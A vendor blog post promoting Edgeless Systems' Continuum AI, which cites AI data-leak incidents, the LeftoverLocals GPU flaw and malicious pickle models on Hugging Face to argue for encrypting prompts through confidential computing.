Continuum AI is now public. Try out the most secure GenAI service!

Ai prompts icon

Blog

AI security: Here's why you should keep your prompts and responses encrypted and how to go about it

Lara Montoya Laske


Data privacy is blocking AI adoption


In today’s business landscape, AI services like ChatGPT, Claude, Mistral, and others can enhance productivity and efficiency across various industries. These technologies streamline tasks and contribute to overall competitiveness.

 

However, concerns over data privacy, security, and compliance block their adoption. According to a survey conducted by Gartner, organizations are worried about AI security, with 50% expressing concerns about competitors, partners, or other third parties, and 49% citing malicious hackers. Among organizations that have faced an AI security or privacy incident, 60% reported data compromise originating from an internal party.


A survey by Blackberry found that 67% of the respondents saw potential risks to data security and privacy as the biggest reason to not use ChatGPT and similar generative AI tools.

 

When using these GenAI platforms like ChatGPT, employees put in data, which then goes through four entities: the service provider, inference provider, model owner, and infrastructure provider.  Each entity possesses access to your data and runs the risk of data exposure while running the workload provided by the model owner.


Recent incidents


Recently, there have been several incidents highlighting the necessity to protect both the prompts submitted to LLMs and the responses generated.


Samsung employees leaked company data to ChatGPT


An example of a leak via a service provider, in this case ChatGPT, is the recent incident at Samsung. On three different occasions, Samsung employees accidentally shared confidential information while using ChatGPT for help at work. In one instance, an employee pasted confidential source code into the chat to check for errors. Another employee shared code with ChatGPT and "requested code optimization." A third shared a recording of a meeting to convert into notes for a presentation. Samsung responded swiftly by banning employees to use ChatGPT on work-related tasks. They also announced they are considering developing an in-house AI service to prevent similar incidents.


Samsung is not the only company that has restricted the use of AI services to employees; in fact, many banking companies such as JPMorgan Chase, CitiGroup, Bank of America, Deutsche Bank, Goldman Sachs and Wells Fargo have implemented similar restrictions. According to a study by Cyberhaven from 2023, sensitive company data makes up 11% of what employees paste into ChatGPT. Some of this data could potentially come back to other users in the response, because ChatGPT is using all the data that’s been uploaded to train its model.


Moreover, the famous LLM service also has precedents of bugs exposing sensitive data such as payment info, for which it had to take the platform offline for some hours.


GPU vulnerabilities could expose data to the service provider


Data can also be compromised through vulnerabilities in GPUs and shared inference infrastructure. One such vulnerability is LeftoverLocals, affecting GPUs from companies like Apple, Qualcomm, AMD, and Imagination, which could be likely exploited by the service or infrastructure provider side.

 
LeftoverLocals allows attackers to recover data from GPU local memory created by another process. This means they can eavesdrop on another user's interactive sessions across process or container boundaries. By exploiting the co-residency of multiple programs on shared hardware, attackers gain unauthorized access to sensitive information. They only need the ability to run specific programs on the GPU, which is achievable without special privileges. The code to dump uninitialized local memory is easy and typically less than 10 lines. The leftover data can then be collected by the attacker.


Shared inference infrastructure takeover risk


Another vulnerability based on shared inference infrastructure has been discovered by Wiz Research. The research found that attackers could compromise AI services like Hugging Face by uploading malicious models. Attackers were able to embed malicious code within pickle-serialized models. Consequently, the model can remotely execute code that potentially grants attackers escalated privileges and cross-tenant access to other customers' models. Through container escape techniques, attackers can then access sensitive data, posing a significant risk of cross-tenant breaches. This jeopardizes the security of all models hosted on the platform.


The solution: Edgeless Systems’ confidential computing solutions


We built Continuum AI to protect against all these threats. Continuum AI leverages the capabilities of confidential-computing powered NVIDIA GPUs.

 
Confidential computing is a technology that encrypts data even at runtime, using the latest CPUs from Intel and AMD in combination with the latest GPUs from NVIDIA. Additionally, it verifies workload integrity through remote attestation using cryptographic certificates, ensuring secure data processing even on external infrastructure.


Continuum AI is a secure framework for deploying AI models, which safeguards user prompts and responses from all other parties. Its threat model accounts for three potential threats: the model provider, infrastructure provider, and service provider. The service provider executes the workload from the model provider and may utilize infrastructure from an external provider.

 
In short, with Continuum the AI model runs in a confidential computing environment (CCE) where data stays encrypted in memory. The inference code that processes your prompt operates in a sandbox to prevent data leaks. This ensures two things: (1) the infrastructure can't access your data or the inference code, and (2) the inference code can't leak your data through memory, the disk, or the network. Continuum establishes an encrypted channel between you and the sandboxed inference code. Prompts are encrypted on the user side, decrypted in the CCE, and re-encrypted before transmission, ensuring they remain hidden from the service provider.


In this way, companies can use ChatGPT-like services securely, leveraging the latest AI capabilities while maintaining compliance. For more technical details, read the documentation. We now have a public preview of Continuum, featuring the popular model Mistral 7B, with Llama 3 70B coming soon. Try it out now!


Author: Lara Montoya Laske


Related reading

View all